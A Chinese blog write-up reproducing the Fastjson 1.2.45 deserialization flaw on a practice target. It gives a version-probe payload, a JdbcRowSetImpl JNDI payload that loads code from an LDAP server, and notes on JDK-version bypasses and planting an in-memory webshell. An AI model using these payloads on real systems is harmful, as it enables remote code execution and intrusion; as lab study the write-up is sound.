Fatsjson1245漏洞复现
Fastjson 1245 利用
简介#
这是一个利用fastjson 1245 反序列化漏洞的靶场。
漏洞复现#
点击登录,进入登录页面,进行用户名和密码的输入。在 bp 中就可以发现登录使用的是 json 格式的 post 请求。
发送到 Repeater 中,也可以看到请求头中 Content-Type 为 application/json。
使用{"@type":"java.lang.AutoCloseable"
可以探测出版本信息。
github 上的一个 fastjson payload 库:https://github.com/safe6Sec/Fastjson
然后直接使用通用 payload:
{{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"ldap://localhost:1389/eydNC",
"autoCommit":true
}
}}
除了考虑Fastjson版本,还得考虑JDK版本,中间件版本,第三方依赖版本。
JDK版本对于JDNI注入的限制,基于RMI利用的JDK版本<=6u141、7u131、8u121,基于LDAP利用的JDK版本<=6u211、7u201、8u191。(更高版本也有绕过)
这里的JDK版本是 8u342 大于了 8u191 所以需要高版本的绕过方式。
我这里使用的是 JNDIBypass.jar 工具来进行打入一个内存马,因为我这里反弹 shell 一直不行。
作者:qianyuzz
出处:https://www.cnblogs.com/qianyuzz/p/17998152
版权:本作品采用「署名-非商业性使用-相同方式共享 4.0 国际」许可协议进行许可。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 全程不用写代码,我用AI程序员写了一个飞机大战
· DeepSeek 开源周回顾「GitHub 热点速览」
· 记一次.NET内存居高不下排查解决与启示
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!